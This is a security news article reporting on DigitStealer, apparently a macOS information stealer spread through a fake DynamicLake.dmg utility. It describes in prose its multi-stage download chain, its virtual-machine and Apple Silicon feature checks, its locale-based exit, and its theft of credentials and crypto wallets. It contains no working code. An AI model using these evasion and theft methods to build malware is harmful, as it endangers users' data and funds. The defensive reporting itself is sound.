A sophisticated new malware family, dubbed DigitStealer, is targeting macOS systems with advanced techniques designed to evade detection and operate stealthily. This information stealer employs multi-stage attack chains, utilizing multiple payloads to compromise user data while minimizing its footprint on infected machines. The malware disguises itself as legitimate software and leverages clever methods to bypass Apple’s security measures, posing a significant threat to unsuspecting users.
DigitStealer was discovered disguised within an unsigned disk image file named DynamicLake.dmg. This file masqueraded as a legitimate utility, tricking users into executing a file labeled “Drag Into Terminal.msi.” This action initiates the infection process. Alarmingly, at the time of its discovery, no antivirus engines on VirusTotal detected this emerging threat, highlighting its immediate danger to Mac users.
One of the most notable features of DigitStealer is its use of advanced hardware checks to prevent execution on virtual machines or older Mac computers. According to Jamf security researchers, this malware specifically targets newer Apple Silicon systems, particularly those equipped with M2 chips and above. It actively avoids Intel-based Macs and even earlier M1 devices. The malware performs a comprehensive series of system verifications before unleashing its primary payload.
The infection sequence begins with a simple bash command that downloads an encoded script from a remote server. Once decoded, this script executes a series of verification steps to ensure it is running only on physical Mac computers possessing specific hardware characteristics. This meticulous approach helps DigitStealer avoid analysis by security researchers who commonly utilize virtual environments or older hardware for their investigations.
Detection Evasion Through Advanced Hardware Checks
DigitStealer employs sophisticated techniques to distinguish between physical machines and analysis environments. The malware queries hardware information using system commands and scrutinizes the output for keywords such as “Virtual” or “VM.” If any such indicators are detected, the malware promptly terminates its execution, ensuring it remains hidden from prying eyes. A particularly significant aspect of its evasion strategy involves checking for specific Apple Silicon features.
The malware utilizes system commands to verify the presence of advanced ARM processor capabilities. Specifically, it queries for features like hw.optional.arm.FEAT_BTI, hw.optional.arm.FEAT_SSBS, and hw.optional.arm.FEAT_ECV. These commands confirm whether the target system possesses the capabilities exclusive to M2 or newer chips. This targeted approach effectively limits the malware’s reach to the most recent Mac models, a strategy that makes it harder to detect and analyze using older or virtualized systems.
Additionally, the malware checks the system’s locale. If it detects specific countries, it may exit its execution. This behavior could be an attempt to avoid jurisdictions with stricter cybersecurity laws or enforcement, further complicating attribution and prosecution efforts. This deliberate selection of targets, both in terms of hardware and geography, underscores the high level of sophistication behind DigitStealer’s design.
Once DigitStealer successfully passes all its rigorous verification checks, it proceeds to download four distinct payloads from remote servers. Each of these payloads is designed with a specialized function. These include the theft of browser credentials, the compromise of cryptocurrency wallets, and the modification of legitimate applications, such as Ledger Live, a popular cryptocurrency wallet interface. The malware’s use of legitimate Cloudflare services to host these payloads adds another layer of complexity, making it more challenging for security products to detect and block the malicious content.
The ongoing evolution of malware like DigitStealer highlights the persistent need for robust security practices on all platforms, including macOS. As threat actors develop increasingly complex evasion techniques, users and security professionals must remain vigilant. The next steps in combating this threat will likely involve the development of more advanced detection methods that can identify these specific hardware-based evasion tactics and the continued sharing of threat intelligence between security researchers and vendors. The focus will remain on fortifying macOS defenses against multi-stage attacks and sophisticated information stealers.